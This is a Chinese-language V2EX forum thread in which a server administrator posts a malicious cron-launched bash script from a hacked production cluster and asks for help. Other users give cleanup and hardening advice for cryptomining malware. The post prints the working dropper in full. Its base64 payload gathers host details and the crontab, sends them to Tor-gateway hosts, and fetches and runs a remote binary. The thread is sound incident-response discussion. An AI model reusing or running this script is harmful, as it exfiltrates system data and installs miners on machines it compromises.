生产服务器集群被黑了,帮看看这个脚本

2020-09-02 16:29:16 +08:00
 nimab

#!/bin/bash

exec &>/dev/null

echo ncM85D4kux95mCiJpO2bEuK6pSDgAxyo8iDwzI2aeW4D9rutGHUWkn85gtzMkzxU

echo bmNNODVENGt1eDk1bUNpSnBPMmJFdUs2cFNEZ0F4eW84aUR3ekkyYWVXNEQ5cnV0R0hVV2tuODVndHpNa3p4VQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI0aXVjaWd4dmxmeDR2Y3FuNXNvcmRlcnNhYTNhM3p0amNhb3N6cHR4eG81YjNwYm42bmx3c2ZhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgZG5zLmRucy1vdmVyLWh0dHBzLmNvbSB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2guY2VudHJhbGV1LnBpLWRucy5jb20gZG9oLmRucy5zYiBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyBkbnMuZmxhdHVzbGlmaXIuaXMgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTEzKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdG1wIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3Ugb25pb24uY29tLmRlIHRvcjJ3ZWIudG8gb25pb24uc2gKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

crontab 里这个 20 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

清理 crontab 是没用的。

3377 次点击
所在节点   Bash
6 条回复
uncat
2020-09-02 21:44:49 +08:00
这个文件: /root/.systemd-service.sh 的内容是上面这个?
uncat
2020-09-02 22:28:50 +08:00
搜索一下一个类似于这样的进程: e4133fc85b74c4a791611e2ced190609 (预计是 33 个字符组成) kill 掉它
uncat
2020-09-02 22:43:27 +08:00
https://www.cnblogs.com/royfans/p/12722792.html 这篇文章很类似可以参考一下.
ward56
2021-01-21 10:11:29 +08:00
根据以往经验,这是一个挖矿子进程的脚本,需要 base64 解码,一般解码出来就是请求一个 url 及一些优化你系统的脚本,你不需要去分析它的内容。
主进程一般在 /etc/cron.d/0systemd
1 子进程 .systemd-service.sh 隐藏脚本
2 子进程 根目录下的某个目录下 systemd-service.sh 脚本

解决方法:
1. find 上述 3 个进程脚本和计划任务,删除掉
2.找到上述系统上对应的恶意程序 kill 掉
3.用 lsof 找到 /proc 内存里已经删除源脚本的进程杀掉
4 ./bin/ 下的所有命令不要执行,尤其 url culr wget 等命令,找一个健康的干净系统,把系统里 /bin 下命令还原覆盖到这个系统里。

验证:
重启操作系统,观察一个周期确定是否进程还会启动
nimab
2021-01-21 11:02:26 +08:00
@ward56 上个月又中一次,清掉了,主要就是删掉进程,封掉那些 url,一个多月再没出现。现在问题就是内存使用比之前高一些,找不到原因。
ward56
2021-01-21 11:34:50 +08:00
@nimab 封掉 url 治标不治本,实际挖矿木马有休眠期,不会一直运行。
其它健康的服务器,你可以给 openssh 加固,该打补丁的打补丁,该加策略的加策略。
已经中招的服务器按照我发的方法做一遍,关键点是找到对应的 /proc 里的进程对应的程序。(封掉 url 之后非常难定位问题,建议放行 url,把问题爆露出来,全面分析下)
思路就这么简单,你再尝试深挖 linux 进程会变得更有趣。

现在的挖矿木马太多,主要以下大类:
初版的 linux 挖矿程序通过 计划任务执行 crontab 里
进阶版的 linux 挖矿程序通过
1.隐藏文件运行,或者通过加密的脚本。
2.脚本内容一般是重命名的 cur 或 wge 拉取外网的脚本或程序
3.然后删除本地运行的源程序
最终实现,无本地运行程序方式实现挖矿。
高级进阶版
入侵系统之后,先给系统做全面性能优化
包含;内核参数优化 / 性能优化(杀掉占用资源过高的程序,你自己运行的服务)
没有计划任务跑挖矿程序,没有链接公网需求,一次非守护运行。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/703582

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX